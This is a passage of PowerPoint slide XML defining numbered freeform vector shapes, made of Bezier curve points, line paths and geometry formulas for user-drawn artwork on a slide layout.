                      <a:pt x="168" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="163" y="171"/>
                      <a:pt x="161" y="167"/>
                      <a:pt x="160" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159" y="160"/>
                      <a:pt x="160" y="158"/>
                      <a:pt x="160" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="154"/>
                      <a:pt x="160" y="153"/>
                      <a:pt x="161" y="152"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="71" y="68"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="68"/>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="71"/>
                      <a:pt x="74" y="73"/>
                      <a:pt x="77" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="74"/>
                      <a:pt x="85" y="73"/>
                      <a:pt x="88" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="70"/>
                      <a:pt x="94" y="68"/>
                      <a:pt x="98" y="66"/>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79"/>
                      <a:pt x="81" y="80"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="82"/>
                      <a:pt x="76" y="82"/>
                      <a:pt x="73" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="77"/>
                      <a:pt x="69" y="74"/>
                      <a:pt x="67" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="71"/>
                      <a:pt x="66" y="70"/>
                      <a:pt x="65" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="70"/>
                      <a:pt x="65" y="70"/>
                      <a:pt x="65" y="70"/>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1"/>
                      <a:pt x="37" y="122"/>
                      <a:pt x="37" y="123"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="127"/>
                      <a:pt x="35" y="131"/>
                      <a:pt x="37"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5"/>
                      <a:pt x="67" y="176"/>
                      <a:pt x="64" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="177"/>
                      <a:pt x="63" y="177"/>
                      <a:pt x="62" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="179"/>
                      <a:pt x="65" y="181"/>
                      <a:pt x="66" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="186"/>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3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="114" y="173"/>
                      <a:pt x="115" y="172"/>
                      <a:pt x="115" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="116" y="172"/>
                      <a:pt x="116" y="174"/>
                      <a:pt x="117" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="178"/>
                      <a:pt x="117" y="182"/>
                      <a:pt x="115" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="188"/>
                      <a:pt x="114" y="190"/>
                      <a:pt x="114" y="192"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="113" y="194"/>
                      <a:pt x="114" y="195"/>
                      <a:pt x="116" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="191"/>
                      <a:pt x="118" y="186"/>
                      <a:pt x="119" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="178"/>
                      <a:pt x="120" y="175"/>
                      <a:pt x="119" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="167"/>
                      <a:pt x="118" y="163"/>
                      <a:pt x="118" y="159"/>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3"/>
                      <a:pt x="139" y="131"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="138" y="135"/>
                      <a:pt x="136" y="138"/>
                      <a:pt x="132" y="138"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="138"/>
                      <a:pt x="128" y="137"/>
                      <a:pt x="128" y="134"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="132"/>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2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="70"/>
                      <a:pt x="105" y="67"/>
                      <a:pt x="106" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="62"/>
                      <a:pt x="106" y="60"/>
                      <a:pt x="107" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="56"/>
                      <a:pt x="106" y="54"/>
                      <a:pt x="104" y="53"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="52"/>
                      <a:pt x="97" y="51"/>
                      <a:pt x="94" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="48"/>
                      <a:pt x="91" y="47"/>
                      <a:pt x="91" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="43"/>
                      <a:pt x="91" y="41"/>
                      <a:pt x="92" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="93" y="37"/>
                      <a:pt x="95" y="36"/>
                      <a:pt x="98" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="37"/>
                      <a:pt x="101" y="38"/>
                      <a:pt x="102" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="42"/>
                      <a:pt x="103" y="45"/>
                      <a:pt x="102" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="48"/>
                      <a:pt x="101" y="49"/>
                      <a:pt x="102" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="51"/>
                      <a:pt x="107" y="50"/>
                      <a:pt x="107" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="44"/>
                      <a:pt x="107" y="39"/>
                      <a:pt x="105" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="31"/>
                      <a:pt x="100" y="29"/>
                      <a:pt x="96" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="30"/>
                      <a:pt x="88" y="33"/>
                      <a:pt x="87" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="39"/>
                      <a:pt x="87" y="40"/>
                      <a:pt x="87" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="43"/>
                      <a:pt x="87" y="45"/>
                      <a:pt x="87" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="45"/>
                      <a:pt x="83" y="45"/>
                      <a:pt x="81" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="80" y="46"/>
                      <a:pt x="80" y="46"/>
                      <a:pt x="80" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="46"/>
                      <a:pt x="78" y="45"/>
                      <a:pt x="78" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="41"/>
                      <a:pt x="77" y="38"/>
                      <a:pt x="76" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="35"/>
                      <a:pt x="76" y="35"/>
                      <a:pt x="76" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="32"/>
                      <a:pt x="73" y="31"/>
                      <a:pt x="70" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="31"/>
                      <a:pt x="67" y="32"/>
                      <a:pt x="66" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="39"/>
                      <a:pt x="63" y="45"/>
                      <a:pt x="66" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="50"/>
                      <a:pt x="67" y="51"/>
                      <a:pt x="68" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="51"/>
                      <a:pt x="69" y="50"/>
                      <a:pt x="69" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="48"/>
                      <a:pt x="68" y="48"/>
                      <a:pt x="67" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="45"/>
                      <a:pt x="65" y="42"/>
                      <a:pt x="66" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="37"/>
                      <a:pt x="71" y="36"/>
                      <a:pt x="73" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="39"/>
                      <a:pt x="75" y="42"/>
                      <a:pt x="75" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="46"/>
                      <a:pt x="74" y="47"/>
                      <a:pt x="73" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="48"/>
                      <a:pt x="72" y="48"/>
                      <a:pt x="72" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="51"/>
                      <a:pt x="69" y="52"/>
                      <a:pt x="66" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="54"/>
                      <a:pt x="65" y="55"/>
                      <a:pt x="64" y="56"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="58"/>
                      <a:pt x="64" y="59"/>
                      <a:pt x="65" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="60"/>
                      <a:pt x="67" y="61"/>
                      <a:pt x="68" y="62"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="66"/>
                      <a:pt x="74" y="66"/>
                      <a:pt x="78" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="66"/>
                      <a:pt x="87" y="65"/>
                      <a:pt x="91" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="94" y="62"/>
                      <a:pt x="98" y="61"/>
                      <a:pt x="101" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="58"/>
                      <a:pt x="102" y="58"/>
                      <a:pt x="103" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="58"/>
                      <a:pt x="103" y="59"/>
                      <a:pt x="103" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="60"/>
                      <a:pt x="102" y="61"/>
                      <a:pt x="102" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="97" y="63"/>
                      <a:pt x="91" y="65"/>
                      <a:pt x="86" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="69"/>
                      <a:pt x="79" y="69"/>
                      <a:pt x="74" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="69"/>
                      <a:pt x="72" y="68"/>
                      <a:pt x="71" y="68"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="73" y="45"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="43"/>
                      <a:pt x="73" y="41"/>
                      <a:pt x="72" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="40"/>
                      <a:pt x="71" y="40"/>
                      <a:pt x="70" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="40"/>
                      <a:pt x="70" y="41"/>
                      <a:pt x="70" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="41"/>
                      <a:pt x="72" y="42"/>
                      <a:pt x="72" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="44"/>
                      <a:pt x="72" y="45"/>
                      <a:pt x="73" y="45"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="97" y="39"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="40"/>
                      <a:pt x="99" y="42"/>
                      <a:pt x="100" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="43"/>
                      <a:pt x="101" y="43"/>
                      <a:pt x="101" y="42"/>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Freeform 193"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3551" y="2614"/>
                <a:ext cx="3" cy="2"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2 w 2"/>
                  <a:gd name="T1" fmla="*/ 0 h 2"/>
                  <a:gd name="T2" fmla="*/ 1 w 2"/>
                  <a:gd name="T3" fmla="*/ 1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1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="2"/>
                      <a:pt x="0" y="2"/>
                      <a:pt x="0" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="1"/>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Freeform 194"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3564" y="261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Freeform 195"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2004"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Freeform 196"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2152"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Freeform 197"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="23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Freeform 198"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2497"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Freeform 199"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2692"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Freeform 200"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2890"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Freeform 201"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3032" y="3298"/>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Freeform 202"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3140" y="3298"/>
                <a:ext cx="77"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3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9"/>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4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="44"/>
                      <a:pt x="22" y="44"/>
                      <a:pt x="22" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="27"/>
                      <a:pt x="15" y="18"/>
                      <a:pt x="0" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="0"/>
                      <a:pt x="42" y="14"/>
                      <a:pt x="42" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="83"/>
                      <a:pt x="42" y="83"/>
                      <a:pt x="42" y="83"/>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Freeform 203"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3248"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Freeform 204"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3395"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Freeform 205"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3590"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Freeform 206"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3788"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Freeform 207"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3938"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Freeform 208"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4085"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Freeform 209"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4284"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Freeform 210"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4433" y="3292"/>
                <a:ext cx="82"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Freeform 211"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4581"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Freeform 212"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4779"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Freeform 213"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4926"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Freeform 214"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5125"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Freeform 215"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5261" y="3298"/>
                <a:ext cx="188" cy="218"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 188 w 188"/>
                  <a:gd name="T1" fmla="*/ 67 h 218"/>
                  <a:gd name="T2" fmla="*/ 184 w 188"/>
                  <a:gd name="T3" fmla="*/ 84 h 218"/>
                  <a:gd name="T4" fmla="*/ 142 w 188"/>
                  <a:gd name="T5" fmla="*/ 84 h 218"/>
                  <a:gd name="T6" fmla="*/ 131 w 188"/>
                  <a:gd name="T7" fmla="*/ 134 h 218"/>
                  <a:gd name="T8" fmla="*/ 177 w 188"/>
                  <a:gd name="T9" fmla="*/ 134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4 h 218"/>
                  <a:gd name="T32" fmla="*/ 48 w 188"/>
                  <a:gd name="T33" fmla="*/ 134 h 218"/>
                  <a:gd name="T34" fmla="*/ 58 w 188"/>
                  <a:gd name="T35" fmla="*/ 84 h 218"/>
                  <a:gd name="T36" fmla="*/ 11 w 188"/>
                  <a:gd name="T37" fmla="*/ 84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4 h 218"/>
                  <a:gd name="T60" fmla="*/ 78 w 188"/>
                  <a:gd name="T61" fmla="*/ 84 h 218"/>
                  <a:gd name="T62" fmla="*/ 67 w 188"/>
                  <a:gd name="T63" fmla="*/ 134 h 218"/>
                  <a:gd name="T64" fmla="*/ 110 w 188"/>
                  <a:gd name="T65" fmla="*/ 134 h 218"/>
                  <a:gd name="T66" fmla="*/ 121 w 188"/>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4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188"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Freeform 216"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5478"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0" name="Freeform 217"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5904" y="3292"/>
                <a:ext cx="82"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419"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1951" y="0"/>
              <a:ext cx="5890" cy="3541"/>
              <a:chOff x="1951" y="0"/>
              <a:chExt cx="5890" cy="3541"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1349" name="Freeform 219"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6051"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220"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="62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221"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="639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222"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6547"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223"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6744"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Freeform 224"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6893"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225"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7043"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Freeform 226"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7192"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227"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7340"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3"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228"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="753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229"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7686"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230"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5672" y="3284"/>
                <a:ext cx="218" cy="256"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 175 w 179"/>
                  <a:gd name="T1" fmla="*/ 174 h 209"/>
                  <a:gd name="T2" fmla="*/ 134 w 179"/>
                  <a:gd name="T3" fmla="*/ 209 h 209"/>
                  <a:gd name="T4" fmla="*/ 81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2 w 179"/>
                  <a:gd name="T23" fmla="*/ 84 h 209"/>
                  <a:gd name="T24" fmla="*/ 58 w 179"/>
                  <a:gd name="T25" fmla="*/ 28 h 209"/>
                  <a:gd name="T26" fmla="*/ 117 w 179"/>
                  <a:gd name="T27" fmla="*/ 18 h 209"/>
                  <a:gd name="T28" fmla="*/ 159 w 179"/>
                  <a:gd name="T29" fmla="*/ 129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7 w 179"/>
                  <a:gd name="T85" fmla="*/ 42 h 209"/>
                  <a:gd name="T86" fmla="*/ 78 w 179"/>
                  <a:gd name="T87" fmla="*/ 44 h 209"/>
                  <a:gd name="T88" fmla="*/ 66 w 179"/>
                  <a:gd name="T89" fmla="*/ 35 h 209"/>
                  <a:gd name="T90" fmla="*/ 67 w 179"/>
                  <a:gd name="T91" fmla="*/ 48 h 209"/>
                  <a:gd name="T92" fmla="*/ 73 w 179"/>
                  <a:gd name="T93" fmla="*/ 48 h 209"/>
                  <a:gd name="T94" fmla="*/ 65 w 179"/>
                  <a:gd name="T95" fmla="*/ 60 h 209"/>
                  <a:gd name="T96" fmla="*/ 101 w 179"/>
                  <a:gd name="T97" fmla="*/ 59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9"/>
                      <a:pt x="134" y="209"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="209"/>
                      <a:pt x="128" y="209"/>
                      <a:pt x="125" y="208"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="208"/>
                      <a:pt x="119" y="206"/>
                      <a:pt x="118" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="116" y="200"/>
                      <a:pt x="113" y="198"/>
                      <a:pt x="110" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="198"/>
                      <a:pt x="90" y="199"/>
                      <a:pt x="81" y="199"/>
                    </a:cubicBezTo>
